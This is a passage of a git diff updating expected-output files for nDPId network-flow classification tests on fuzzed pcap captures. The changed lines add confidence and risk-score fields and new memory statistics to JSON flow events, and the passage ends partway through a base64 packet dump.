-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","total-events-serialized":204}
+00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","total-events-serialized":205}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 131/117
 ~~ skipped flows.............: 0
@@ -210,9 +211,9 @@
 ~~ total active/idle flows...: 38/38
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4679081 bytes
-~~ total memory freed........: 4679081 bytes
-~~ total allocations/frees...: 99834/99834
+~~ total memory allocated....: 4746858 bytes
+~~ total memory freed........: 4746858 bytes
+~~ total allocations/frees...: 101424/101424
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 177 chars
 ~~ json string max len.......: 2419 chars
diff --git a/test/results/fuzz-2020-02-16-11740.pcap.out b/test/results/fuzz-2020-02-16-11740.pcap.out
index 5f68030a9..d388a97d7 100644
--- a/test/results/fuzz-2020-02-16-11740.pcap.out
+++ b/test/results/fuzz-2020-02-16-11740.pcap.out
@@ -1,33 +1,33 @@
 00453{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01381{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1528996067791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528996067791,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMZAAP8RAAAKDEAebOIZNXIQBxQCxwAAAQoCv14OK3h3MxRiiuPV6g7+kV4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADikDQM2NwZbIqDjATUwMzExNDgwMjeaNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XVkZpd2NjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLUlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RMYWI6DAAAN2MBBgAAAAIGBgAAAEQlAAAABRQ9BgAAABNABgAAAA1BBgAAAAZRRTU2TzoCAQA4ATAzMTE0ODAyNzE